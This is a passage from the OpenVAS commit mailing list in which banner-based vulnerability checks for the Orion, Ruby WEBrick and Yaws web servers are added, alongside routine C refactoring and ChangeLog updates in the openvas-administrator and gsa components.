+ script_dependencies("find_service.nes"); + script_require_ports("Services/www", 80); + exit(0); +} + + +include("http_func.inc"); +include("http_keepalive.inc"); +include("version_func.inc"); + +port = get_http_port(default:80); +if(!get_port_state(port))exit(0); + +banner = get_http_banner(port: port); +if(!banner)exit(0); + +if("Server: Orion/" >!< banner)exit(0); + +if(!version = eregmatch(pattern: "Orion/([0-9.]+)", string: banner))exit(0); + +if(!isnull(version[1])) { + + if(version_is_less_equal(version: version[1], test_version: "2.0.7")) { + security_warning(port:port); + exit(0); + } + +} + +exit(0); + Property changes on: trunk/openvas-plugins/scripts/orion_webserver_37717.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/ruby_WEBrick_37710.nasl =================================================================== --- trunk/openvas-plugins/scripts/ruby_WEBrick_37710.nasl 2010-01-13 10:19:49 UTC (rev 6390) +++ trunk/openvas-plugins/scripts/ruby_WEBrick_37710.nasl 2010-01-13 10:20:27 UTC (rev 6391) @@ -0,0 +1,108 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Ruby WEBrick Terminal Escape Sequence in Logs Command Injection Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100445); + script_bugtraq_id(37710); + script_cve_id("CVE-2009-4492"); + script_version ("1.0-$Revision$"); + + script_name("Ruby WEBrick Terminal Escape Sequence in Logs Command Injection Vulnerability"); + +desc = "Overview: +Ruby WEBrick is prone to a command-injection vulnerability because it +fails to adequately sanitize user-supplied input in log files. + +Attackers can exploit this issue to execute arbitrary commands in +a terminal. + +Versions *prior to* the following are affected: + +Ruby 1.8.6 patchlevel 388 Ruby 1.8.7 patchlevel 249 Ruby 1.9.1 +patchlevel 378 + +Solution: +Updates are available. Please see the references for details. + +References: +http://www.securityfocus.com/bid/37710 +http://www.ruby-lang.org +http://www.ruby-lang.org/en/news/2010/01/10/webrick-escape-sequence-injection/ +http://www.securityfocus.com/archive/1/508830 + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine the Ruby version"); + script_category(ACT_GATHER_INFO); + script_family("Web Servers"); + script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH"); + script_dependencies("find_service.nes"); + script_require_ports("Services/www", 8080); + exit(0); +} + + +include("http_func.inc"); +include("version_func.inc"); + +port = get_http_port(default:8080); +if(!get_port_state(port))exit(0); + +banner = get_http_banner(port: port); +if(!banner)exit(0); + +if("Server: WEBrick" >!< banner)exit(0); +if(!matches = eregmatch(pattern: "Server: WEBrick/[0-9.]+ \(Ruby/([0-9.]+)/([0-9]{4}-[0-9]{2}-[0-9]{2})\)", string: banner))exit(0); +if(isnull(matches[1]) || isnull(matches[2]))exit(0); + +release = matches[1]; +release_date = matches[2]; + + if(version_is_equal(version: release, test_version: "1.8.6") || + version_is_equal(version: release, test_version: "1.8.7") || + version_is_equal(version: release, test_version: "1.9.1")) { + + rdate = split(release_date, sep: "-", keep: FALSE); + if(isnull(rdate[0]) || isnull(rdate[1]) || isnull(rdate[2]))exit(0); + + if(int(rdate[0]) < 2010) { + VULN = TRUE; + } + else if(int(rdate[0]) == 2010 && int(rdate[1]) == 1 && int(rdate[2]) < 10) { + VULN = TRUE; + } + + if(VULN) { + security_warning(port:port); + exit(0); + } + } + + +exit(0); + Property changes on: trunk/openvas-plugins/scripts/ruby_WEBrick_37710.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/yaws_webserver_37716.nasl =================================================================== --- trunk/openvas-plugins/scripts/yaws_webserver_37716.nasl 2010-01-13 10:19:49 UTC (rev 6390) +++ trunk/openvas-plugins/scripts/yaws_webserver_37716.nasl 2010-01-13 10:20:27 UTC (rev 6391) @@ -0,0 +1,83 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Yaws Terminal Escape Sequence in Logs Command Injection Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100446); + script_bugtraq_id(37716); + script_cve_id("CVE-2009-4495"); + script_version ("1.0-$Revision$"); + + script_name("Yaws Terminal Escape Sequence in Logs Command Injection Vulnerability"); + +desc = "Overview: +Yaws is prone to a command-injection vulnerability because it fails to +adequately sanitize user-supplied input in logfiles. + +Attackers can exploit this issue to execute arbitrary commands in +a terminal. + +Yaws 1.85 is vulnerable; other versions may also be affected. + +References: +http://www.securityfocus.com/bid/37716 +http://yaws.hyber.org/ +http://www.securityfocus.com/archive/1/508830 + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if Yaws version is <= 1.85"); + script_category(ACT_GATHER_INFO); + script_family("Web Servers"); + script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH"); + script_dependencies("find_service.nes"); + script_require_ports("Services/www", 80); + exit(0); +} + + +include("http_func.inc"); +include("version_func.inc"); + +port = get_http_port(default:80); +if(!get_port_state(port))exit(0); + +banner = get_http_banner(port: port); +if(!banner)exit(0); + +if("Server: Yaws/" >!< banner)exit(0); +version = eregmatch(pattern:"Server: Yaws/([0-9.]+)", string: banner); +if(isnull(version[1]))exit(0); + +if(version_is_less_equal(version: version[1], test_version: "1.85")) { + security_warning(port:port); + exit(0); +} + + +exit(0); + Property changes on: trunk/openvas-plugins/scripts/yaws_webserver_37716.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision From scm-commit at wald.intevation.org Wed Jan 13 11:44:30 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 13 Jan 2010 11:44:30 +0100 (CET) Subject: [Openvas-commits] r6392 - in trunk/openvas-administrator: . src Message-ID: <20100113104430.9252C861F2E7@pyrosoma.intevation.org> Author: mattm Date: 2010-01-13 11:44:26 +0100 (Wed, 13 Jan 2010) New Revision: 6392 Modified: trunk/openvas-administrator/ChangeLog trunk/openvas-administrator/src/oap.c Log: * src/oap.c (oap_xml_handle_end_element): Streamline CLIENT_GET_SETTINGS formatting. Modified: trunk/openvas-administrator/ChangeLog =================================================================== --- trunk/openvas-administrator/ChangeLog 2010-01-13 10:20:27 UTC (rev 6391) +++ trunk/openvas-administrator/ChangeLog 2010-01-13 10:44:26 UTC (rev 6392) @@ -1,5 +1,10 @@ 2009-01-13 Matthew Mundell + * src/oap.c (oap_xml_handle_end_element): Streamline CLIENT_GET_SETTINGS + formatting. + +2009-01-13 Matthew Mundell + * src/oap.c (help_text): Add GET_SETTINGS. * src/tests/oap_help_0.c (help_text): Add GET_SETTINGS. Modified: trunk/openvas-administrator/src/oap.c =================================================================== --- trunk/openvas-administrator/src/oap.c 2010-01-13 10:20:27 UTC (rev 6391) +++ trunk/openvas-administrator/src/oap.c 2010-01-13 10:44:26 UTC (rev 6392) @@ -1130,26 +1130,23 @@ GString *scanner_settings = g_string_new (""); g_hash_table_foreach (scanner_settings_hash_table, build_settings_xml, scanner_settings); - SEND_TO_CLIENT_OR_FAIL (""); - SENDF_TO_CLIENT_OR_FAIL ("", + SENDF_TO_CLIENT_OR_FAIL ("" + "", scanner_config_file); SEND_TO_CLIENT_OR_FAIL (scanner_settings->str); - SEND_TO_CLIENT_OR_FAIL (""); - - SEND_TO_CLIENT_OR_FAIL (""); + SEND_TO_CLIENT_OR_FAIL ("" + ""); g_string_free (scanner_settings, TRUE); g_hash_table_destroy (scanner_settings_hash_table); } else - { - SENDF_TO_CLIENT_OR_FAIL ("", - scanner_config_file); - SEND_TO_CLIENT_OR_FAIL (""); - } + SENDF_TO_CLIENT_OR_FAIL ("" + "", + scanner_config_file); set_client_state (CLIENT_AUTHENTIC); break; } From scm-commit at wald.intevation.org Wed Jan 13 12:13:40 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 13 Jan 2010 12:13:40 +0100 (CET) Subject: [Openvas-commits] r6393 - in trunk/openvas-administrator: . src Message-ID: <20100113111340.6CFA586607D2@pyrosoma.intevation.org> Author: mattm Date: 2010-01-13 12:13:37 +0100 (Wed, 13 Jan 2010) New Revision: 6393 Modified: trunk/openvas-administrator/ChangeLog trunk/openvas-administrator/src/oap.c Log: * src/oap.c (oap_xml_handle_end_element): Make the get_all_settings error in CLIENT_GET_SETTINGS an internal error. Modified: trunk/openvas-administrator/ChangeLog =================================================================== --- trunk/openvas-administrator/ChangeLog 2010-01-13 10:44:26 UTC (rev 6392) +++ trunk/openvas-administrator/ChangeLog 2010-01-13 11:13:37 UTC (rev 6393) @@ -1,9 +1,14 @@ -2009-01-13 Matthew Mundell +2010-01-13 Matthew Mundell + * src/oap.c (oap_xml_handle_end_element): Make the get_all_settings error + in CLIENT_GET_SETTINGS an internal error. + +2010-01-13 Matthew Mundell + * src/oap.c (oap_xml_handle_end_element): Streamline CLIENT_GET_SETTINGS formatting. -2009-01-13 Matthew Mundell +2010-01-13 Matthew Mundell * src/oap.c (help_text): Add GET_SETTINGS. Modified: trunk/openvas-administrator/src/oap.c =================================================================== --- trunk/openvas-administrator/src/oap.c 2010-01-13 10:44:26 UTC (rev 6392) +++ trunk/openvas-administrator/src/oap.c 2010-01-13 11:13:37 UTC (rev 6393) @@ -1142,11 +1142,7 @@ g_hash_table_destroy (scanner_settings_hash_table); } else - SENDF_TO_CLIENT_OR_FAIL ("" - "", - scanner_config_file); + SENDF_TO_CLIENT_OR_FAIL (XML_INTERNAL_ERROR ("get_settings")); set_client_state (CLIENT_AUTHENTIC); break; } From scm-commit at wald.intevation.org Wed Jan 13 12:16:36 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 13 Jan 2010 12:16:36 +0100 (CET) Subject: [Openvas-commits] r6394 - in trunk/openvas-administrator: . src Message-ID: <20100113111636.F319486607BD@pyrosoma.intevation.org> Author: mattm Date: 2010-01-13 12:16:35 +0100 (Wed, 13 Jan 2010) New Revision: 6394 Modified: trunk/openvas-administrator/ChangeLog trunk/openvas-administrator/src/oap.c Log: * src/oap.c: Format single expression branches consistently. Modified: trunk/openvas-administrator/ChangeLog =================================================================== --- trunk/openvas-administrator/ChangeLog 2010-01-13 11:13:37 UTC (rev 6393) +++ trunk/openvas-administrator/ChangeLog 2010-01-13 11:16:35 UTC (rev 6394) @@ -1,5 +1,9 @@ 2010-01-13 Matthew Mundell + * src/oap.c: Format single expression branches consistently. + +2010-01-13 Matthew Mundell + * src/oap.c (oap_xml_handle_end_element): Make the get_all_settings error in CLIENT_GET_SETTINGS an internal error. Modified: trunk/openvas-administrator/src/oap.c =================================================================== --- trunk/openvas-administrator/src/oap.c 2010-01-13 11:13:37 UTC (rev 6393) +++ trunk/openvas-administrator/src/oap.c 2010-01-13 11:16:35 UTC (rev 6394) @@ -191,9 +191,7 @@ fail = openvas_authenticate (credentials->username, credentials->password); if (fail == 0) - { - return 0; - } + return 0; return fail; } return 1; @@ -1112,9 +1110,7 @@ set_client_state (CLIENT_AUTHENTIC); } else - { - SEND_TO_CLIENT_OR_FAIL (XML_INTERNAL_ERROR ("sync_feed")); - } + SEND_TO_CLIENT_OR_FAIL (XML_INTERNAL_ERROR ("sync_feed")); openvasad_remove_lockfile (); set_client_state (CLIENT_AUTHENTIC); break; From scm-commit at wald.intevation.org Wed Jan 13 12:40:20 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 13 Jan 2010 12:40:20 +0100 (CET) Subject: [Openvas-commits] r6395 - in trunk/openvas-administrator: . src Message-ID: <20100113114020.125DA861F2FD@pyrosoma.intevation.org> Author: mattm Date: 2010-01-13 12:40:19 +0100 (Wed, 13 Jan 2010) New Revision: 6395 Modified: trunk/openvas-administrator/ChangeLog trunk/openvas-administrator/src/admin.c trunk/openvas-administrator/src/admin.h Log: * src/admin.c, src/admin.h: Make comments consistent with rest of module. Remove "void"s from empty arg lists. Modified: trunk/openvas-administrator/ChangeLog =================================================================== --- trunk/openvas-administrator/ChangeLog 2010-01-13 11:16:35 UTC (rev 6394) +++ trunk/openvas-administrator/ChangeLog 2010-01-13 11:40:19 UTC (rev 6395) @@ -1,5 +1,10 @@ 2010-01-13 Matthew Mundell + * src/admin.c, src/admin.h: Make comments consistent with rest of module. + Remove "void"s from empty arg lists. + +2010-01-13 Matthew Mundell + * src/oap.c: Format single expression branches consistently. 2010-01-13 Matthew Mundell Modified: trunk/openvas-administrator/src/admin.c =================================================================== --- trunk/openvas-administrator/src/admin.c 2010-01-13 11:16:35 UTC (rev 6394) +++ trunk/openvas-administrator/src/admin.c 2010-01-13 11:40:19 UTC (rev 6395) @@ -57,13 +57,13 @@ /** @todo Add contention handling at this level. */ /** - * @brief Convenience function to produce text output from key/value pairs of - * settings. + * @brief Convenience function to produce text output from key/value settings. + * * This function is used by g_hash_table_foreach(). * - * @param key The key. - * @param value The value corresponding to the key. - * @param user_data A GString object to which the output should be appended. + * @param[in] key The key. + * @param[in] value The value corresponding to the key. + * @param[in] user_data A GString object to which the output should be appended. */ static void print_setting (void * key, void * value, void * user_data) @@ -76,10 +76,11 @@ /** * @brief Convenience function to produce XML output from user list items. + * * This function is used by g_slist_foreach(). * - * @param data The item's data. - * @param user_data User data passed to g_slist_foreach(). + * @param[in] data The item's data. + * @param[in] user_data User data passed to g_slist_foreach(). */ static void print_user (void * data, void * user_data) @@ -95,8 +96,8 @@ * @brief Convenience function to produce text output from user list items. * This function is used by g_slist_foreach(). * - * @param data The item's data. - * @param user_data User data passed to g_slist_foreach(). + * @param[in] data The item's data. + * @param[in] user_data User data passed to g_slist_foreach(). */ static void print_user_text (void * data, void * user_data) @@ -117,8 +118,10 @@ * @todo FIXME: handle symbolic links * @todo Move to libs? * + * @param[in] name Name of file or directory. + * * @return 1 if parameter is directory, 0 if it is not, -1 if it does not - * exist or could not be accessed. + * exist or could not be accessed. */ static int check_is_dir (const char* name) @@ -143,15 +146,16 @@ * * @todo Move to libs? * - * @param pathname The name of the file to be deleted from the filesystem. + * @param[in] pathname The name of the file to be deleted from the filesystem. * * @return 0 if the name was successfully deleted, -1 if an error occurred. - * Please note that errno is currently not guaranteed to contain the correct - * value if -1 is returned. + * Please note that errno is currently not guaranteed to contain the correct + * value if -1 is returned. */ static int remove_recurse (const gchar * pathname) { + /** @todo Set errno when we return -1 to maintain remove() compatibility. */ if (check_is_dir (pathname) == 1) { GError *error = NULL; @@ -161,8 +165,6 @@ { g_warning ("g_dir_open(%s) failed - %s\n", pathname, error->message); g_error_free (error); - // errno should be set when we return -1 to maintain remove() - // compatibility. return -1; } else @@ -192,8 +194,8 @@ /** * @brief Descending strcmp. * - * @param one First string. - * @param two Second string. + * @param[in] one First string. + * @param[in] two Second string. * * @return Negation of return from strcmp on args. */ @@ -204,16 +206,15 @@ } /** - * @brief Returns a list of user directories (= users) found in a given - * directory. + * @brief Returns list of user directories (= users) found in given directory. * - * @param directory The complete name of the directory. - * @param ascending Ascending order if true, descending order if 0. + * @param[in] directory The complete name of the directory. + * @param[in] ascending Ascending order if true, descending order if 0. * * @return A pointer to a GSList containing the names of the users or NULL if - * the directory could not be opened, did not exist or was not a directory. - * The list should be freed with g_slist_free when no longer needed. Each - * element of the list should be freed with g_free. + * the directory could not be opened, did not exist or was not a directory. + * The list should be freed with g_slist_free when no longer needed. Each + * element of the list should be freed with g_free. */ GSList * openvas_admin_list_users (const gchar * directory, int ascending) @@ -280,7 +281,7 @@ /** * @brief Produces a newline separated list from a GHashTable of settings. * - * @param preferences A pointer to a GHashTable containing settings. + * @param[in] preferences A pointer to a GHashTable containing settings. * * @return A pointer to a GString containing the settings list. */ @@ -296,12 +297,11 @@ } /** - * @brief Produces an ocp_response element for a list_users request from a - * GSList of users. + * @brief Produces an OAP LIST_USERS response from a list of users. * - * @param users A pointer to a GSList containing user names. + * @param[in] users A pointer to a GSList containing user names. * - * @return A pointer to a GString containig the ocp_response element. + * @return The OAP response. */ GString * print_users_xml (GSList * users) @@ -323,12 +323,14 @@ } /** - * @brief Produces a simple newline separated list of user names from a - * GSList of users. + * @brief Convert a list of users into a string. * - * @param users A pointer to a GSList containing user names. + * Produces a simple newline separated list of user names from a list of + * users. * - * @return A pointer to a GString containig the ocp_response element. + * @param[in] users A pointer to a GSList containing user names. + * + * @return A newline separated list of user names. */ GString * print_users_text (GSList * users) @@ -344,14 +346,13 @@ /** * @brief Adds a new user to the OpenVAS installation. * - * @param name The name of the new user. - * @param password The password of the new user. - * @param role The role of the user. - * @param directory The directory containing the user directories. It will be - * created if it does not exist already. + * @todo Adding users authenticating with certificates is not yet implemented. * - * \todo TODO: Adding users authenticating with certificates is not yet - * implemented. + * @param[in] name The name of the new user. + * @param[in] password The password of the new user. + * @param[in] role The role of the user. + * @param[in] directory The directory containing the user directories. It + * will be created if it does not exist already. * * @return 0 if the user has been added successfully, -1 on error, -2 if user * exists already. @@ -493,8 +494,8 @@ /** * @brief Removes an user from the OpenVAS installation. * - * @param name The name of the user to be removed. - * @param directory The directory containing the user directories. + * @param[in] name The name of the user to be removed. + * @param[in] directory The directory containing the user directories. * * @return 0 if the user has been removed successfully, -1 on error, * -2 if failed to find such a user. @@ -547,10 +548,10 @@ /** * @brief Sets the rules for an existing user. * - * @param name The name of the user. - * @param rules_file A file containing the new rules to be applied to the - * user. Note that the new rules will overwrite all old rules. - * @param directory The directory containing the user directories. + * @param[in] name The name of the user. + * @param[in] rules_file A file containing the new rules to be applied to the + * user. Note that the new rules will overwrite all old rules. + * @param[in] directory The directory containing the user directories. * * @return TRUE if the rules have been changed successfully, FALSE if not. */ @@ -632,11 +633,13 @@ } /** - * @brief Ask an NVT synchronization script to perform a selftest and report + * @brief Request an NVT synchronization script selftest. + * + * Ask an NVT synchronization script to perform a selftest and report * the results. * - * @param sync_script The file name of the synchronization script. - * @param [out] Return location for selftest errors, or NULL. + * @param[in] sync_script The file name of the synchronization script. + * @param[out] result Return location for selftest errors, or NULL. * * @return TRUE if the selftest was successful, or FALSE if an error occured. */ @@ -703,14 +706,13 @@ } /** - * @brief Retrieves the identification string of an NVT synchronization - * script, with basic validation. + * @brief Retrieves the ID string of an NVT sync script, with basic validation. * - * @param sync_script The file name of the synchronization script. - * @param [out] Return location of the identification string. + * @param[in] sync_script The file name of the synchronization script. + * @param[out] identification Return location of the identification string. * * @return TRUE if the identification string was retrieved, or FALSE if an - * error occured. + * error occured. */ gboolean openvas_get_sync_script_identification (const gchar * sync_script, @@ -792,14 +794,13 @@ } /** - * @brief Retrieves the description of an NVT synchronization - * script, with basic validation. + * @brief Retrieves description of an NVT sync script, with basic validation. * - * @param sync_script The file name of the synchronization script. - * @param [out] Return location of the description string. + * @param[in] sync_script The file name of the synchronization script. + * @param[out] description Return location of the description string. * * @return TRUE if the description was retrieved, or FALSE if an error - * occured. + * occured. */ gboolean openvas_get_sync_script_description (const gchar * sync_script, @@ -859,13 +860,11 @@ } /** - * @brief Calls a NVT synchronization script to synchronize the local NVT - * collection. + * @brief Calls an NVT sync script to synchronize the local NVT collection. * - * @param sync_script The file name of the synchronization script. + * @param[in] sync_script The file name of the synchronization script. * - * @return TRUE if the synchronization has finished successfully, FALSE if - * not. + * @return TRUE if the synchronization has finished successfully, FALSE if not. */ gboolean openvas_sync_feed (const gchar * sync_script) @@ -929,13 +928,14 @@ } /** - * @brief Create a lockfile for synchronization and store the name of the + * @brief Lock a sync script. + * + * Create a lockfile for synchronization script and store the name of the * synchronization script. * - * @param sync_script The file name of the synchronization script. + * @param[in] sync_script The file name of the synchronization script. * - * @return TRUE if the lockfile was written successfully, FALSE if - * not. + * @return TRUE if the lockfile was written successfully, FALSE if not. */ gboolean openvasad_create_lockfile (const gchar * sync_script) @@ -965,11 +965,10 @@ /** * @brief Remove a lockfile for synchronization. * - * @return TRUE if the lockfile was removed successfully, FALSE if - * not. + * @return TRUE if the lockfile was removed successfully, FALSE if not. */ gboolean -openvasad_remove_lockfile (void) +openvasad_remove_lockfile () { gchar *lockfile_name = g_build_filename (g_get_tmp_dir (), "openvasad-feed-sync.lock", @@ -992,14 +991,15 @@ } /** - * @brief Determine if the administrator is currently synchronizing with a - * feed, i.e. if a lockfile exists. + * @brief Determine if the administrator is synchronizing with a feed. * + * If a lockfile exists, then the administrator is synchronizing. + * * @return TRUE if the administrator is currently synchronizing with a feed, - * FALSE if not. + * FALSE if not. */ gboolean -openvasad_currently_syncing (void) +openvasad_currently_syncing () { gchar *lockfile_name = g_build_filename (g_get_tmp_dir (), "openvasad-feed-sync.lock", Modified: trunk/openvas-administrator/src/admin.h =================================================================== --- trunk/openvas-administrator/src/admin.h 2010-01-13 11:16:35 UTC (rev 6394) +++ trunk/openvas-administrator/src/admin.h 2010-01-13 11:40:19 UTC (rev 6395) @@ -40,8 +40,8 @@ gboolean openvas_get_sync_script_description (const gchar *, gchar **); gboolean openvasad_create_lockfile (const gchar *); -gboolean openvasad_remove_lockfile (void); -gboolean openvasad_currently_syncing (void); +gboolean openvasad_remove_lockfile (); +gboolean openvasad_currently_syncing (); GString *print_settings (GHashTable *); GString *print_users_xml (GSList *); From scm-commit at wald.intevation.org Wed Jan 13 12:44:25 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 13 Jan 2010 12:44:25 +0100 (CET) Subject: [Openvas-commits] r6396 - in trunk/openvas-administrator: . src Message-ID: <20100113114425.97B8086607DD@pyrosoma.intevation.org> Author: mattm Date: 2010-01-13 12:44:22 +0100 (Wed, 13 Jan 2010) New Revision: 6396 Modified: trunk/openvas-administrator/ChangeLog trunk/openvas-administrator/src/admin.c Log: * src/admin.c (print_settings): Correct arg name in doc. Modified: trunk/openvas-administrator/ChangeLog =================================================================== --- trunk/openvas-administrator/ChangeLog 2010-01-13 11:40:19 UTC (rev 6395) +++ trunk/openvas-administrator/ChangeLog 2010-01-13 11:44:22 UTC (rev 6396) @@ -1,5 +1,9 @@ 2010-01-13 Matthew Mundell + * src/admin.c (print_settings): Correct arg name in doc. + +2010-01-13 Matthew Mundell + * src/admin.c, src/admin.h: Make comments consistent with rest of module. Remove "void"s from empty arg lists. Modified: trunk/openvas-administrator/src/admin.c =================================================================== --- trunk/openvas-administrator/src/admin.c 2010-01-13 11:40:19 UTC (rev 6395) +++ trunk/openvas-administrator/src/admin.c 2010-01-13 11:44:22 UTC (rev 6396) @@ -281,7 +281,7 @@ /** * @brief Produces a newline separated list from a GHashTable of settings. * - * @param[in] preferences A pointer to a GHashTable containing settings. + * @param[in] settings A pointer to a GHashTable containing settings. * * @return A pointer to a GString containing the settings list. */ From scm-commit at wald.intevation.org Wed Jan 13 14:09:48 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 13 Jan 2010 14:09:48 +0100 (CET) Subject: [Openvas-commits] r6397 - in trunk/openvas-administrator: . src Message-ID: <20100113130948.54694861F2D6@pyrosoma.intevation.org> Author: mattm Date: 2010-01-13 14:09:47 +0100 (Wed, 13 Jan 2010) New Revision: 6397 Modified: trunk/openvas-administrator/ChangeLog trunk/openvas-administrator/src/oap.c Log: * src/oap.c (oap_xml_handle_end_element): In CLIENT_SYNC_FEED put the sync code in an else, otherwise when another sync is in progress it runs a second sync and sends two respondses. Modified: trunk/openvas-administrator/ChangeLog =================================================================== --- trunk/openvas-administrator/ChangeLog 2010-01-13 11:44:22 UTC (rev 6396) +++ trunk/openvas-administrator/ChangeLog 2010-01-13 13:09:47 UTC (rev 6397) @@ -1,5 +1,11 @@ 2010-01-13 Matthew Mundell + * src/oap.c (oap_xml_handle_end_element): In CLIENT_SYNC_FEED put the + sync code in an else, otherwise when another sync is in progress it + runs a second sync and sends two respondses. + +2010-01-13 Matthew Mundell + * src/admin.c (print_settings): Correct arg name in doc. 2010-01-13 Matthew Mundell Modified: trunk/openvas-administrator/src/oap.c =================================================================== --- trunk/openvas-administrator/src/oap.c 2010-01-13 11:44:22 UTC (rev 6396) +++ trunk/openvas-administrator/src/oap.c 2010-01-13 13:09:47 UTC (rev 6397) @@ -1100,18 +1100,21 @@ " status_text=\"" STATUS_ERROR_BUSY_TEXT "\">"); SEND_TO_CLIENT_OR_FAIL (""); } - openvasad_create_lockfile (sync_script); - if (openvas_sync_feed (sync_script)) + else { - SEND_TO_CLIENT_OR_FAIL (""); - SEND_TO_CLIENT_OR_FAIL (""); - set_client_state (CLIENT_AUTHENTIC); + openvasad_create_lockfile (sync_script); + if (openvas_sync_feed (sync_script)) + { + SEND_TO_CLIENT_OR_FAIL (""); + SEND_TO_CLIENT_OR_FAIL (""); + set_client_state (CLIENT_AUTHENTIC); + } + else + SEND_TO_CLIENT_OR_FAIL (XML_INTERNAL_ERROR ("sync_feed")); + openvasad_remove_lockfile (); } - else - SEND_TO_CLIENT_OR_FAIL (XML_INTERNAL_ERROR ("sync_feed")); - openvasad_remove_lockfile (); set_client_state (CLIENT_AUTHENTIC); break; } From scm-commit at wald.intevation.org Wed Jan 13 14:13:52 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 13 Jan 2010 14:13:52 +0100 (CET) Subject: [Openvas-commits] r6398 - in trunk/gsa: . src Message-ID: <20100113131352.65ACC861F2D6@pyrosoma.intevation.org> Author: mattm Date: 2010-01-13 14:13:49 +0100 (Wed, 13 Jan 2010) New Revision: 6398 Modified: trunk/gsa/ChangeLog trunk/gsa/src/gsad_oap.c Log: * src/gsad_oap.c (sync_feed_oap): Add DESCRIBE_FEED to COMMANDS so that the sync result comes back on the Feed Management page. Modified: trunk/gsa/ChangeLog =================================================================== --- trunk/gsa/ChangeLog 2010-01-13 13:09:47 UTC (rev 6397) +++ trunk/gsa/ChangeLog 2010-01-13 13:13:49 UTC (rev 6398) @@ -1,3 +1,8 @@ +2010-01-13 Matthew Mundell + + * src/gsad_oap.c (sync_feed_oap): Add DESCRIBE_FEED to COMMANDS so that + the sync result comes back on the Feed Management page. + 2010-01-13 Felix Wolfsteller Updated help. Modified: trunk/gsa/src/gsad_oap.c =================================================================== --- trunk/gsa/src/gsad_oap.c 2010-01-13 13:09:47 UTC (rev 6397) +++ trunk/gsa/src/gsad_oap.c 2010-01-13 13:13:49 UTC (rev 6398) @@ -469,6 +469,7 @@ if (openvas_server_sendf (&session, "" "" + "" "") == -1) { @@ -564,4 +565,3 @@ fflush (stderr); return xsl_transform_oap (credentials, text); } - From scm-commit at wald.intevation.org Wed Jan 13 15:42:24 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 13 Jan 2010 15:42:24 +0100 (CET) Subject: [Openvas-commits] r6399 - in trunk/openvas-plugins: . scripts Message-ID: <20100113144224.C8CF386607D2@pyrosoma.intevation.org> Author: chandra Date: 2010-01-13 15:42:20 +0100 (Wed, 13 Jan 2010) New Revision: 6399 Added: trunk/openvas-plugins/scripts/gb_adobe_flash_player_remote_code_exec_vuln_winxp.nasl trunk/openvas-plugins/scripts/gb_f3site_mult_lfi_vuln.nasl trunk/openvas-plugins/scripts/gb_firefox_dos_vuln_win_jan10.nasl trunk/openvas-plugins/scripts/gb_jpgraph_detect.nasl trunk/openvas-plugins/scripts/gb_jpgraph_mult_xss_vuln.nasl trunk/openvas-plugins/scripts/gb_livezilla_detect.nasl trunk/openvas-plugins/scripts/gb_livezilla_mult_xss_vuln.nasl trunk/openvas-plugins/scripts/gb_ortro_detect.nasl trunk/openvas-plugins/scripts/gb_ortro_mult_vuln_jan10.nasl trunk/openvas-plugins/scripts/secpod_ms10-001.nasl Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/cve_current.txt trunk/openvas-plugins/scripts/cpe.inc Log: Added new plugins Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2010-01-13 13:13:49 UTC (rev 6398) +++ trunk/openvas-plugins/ChangeLog 2010-01-13 14:42:20 UTC (rev 6399) @@ -1,3 +1,19 @@ +2010-01-13 Chandrashekhar B + + * scripts/gb_f3site_mult_lfi_vuln.nasl, + scripts/gb_livezilla_detect.nasl, + scripts/gb_jpgraph_mult_xss_vuln.nasl, + scripts/gb_adobe_flash_player_remote_code_exec_vuln_winxp.nasl, + scripts/gb_ortro_detect.nasl, + scripts/gb_livezilla_mult_xss_vuln.nasl, + scripts/gb_jpgraph_detect.nasl, + scripts/gb_ortro_mult_vuln_jan10.nasl, + scripts/gb_firefox_dos_vuln_win_jan10.nasl, + scripts/secpod_ms10-001.nasl: + Added new plugins. + + * scripts/cpe.inc: Added new CPE's + 2010-01-13 Michael Meyer * scripts/yaws_webserver_37716.nasl Modified: trunk/openvas-plugins/cve_current.txt =================================================================== --- trunk/openvas-plugins/cve_current.txt 2010-01-13 13:13:49 UTC (rev 6398) +++ trunk/openvas-plugins/cve_current.txt 2010-01-13 14:42:20 UTC (rev 6399) @@ -489,3 +489,10 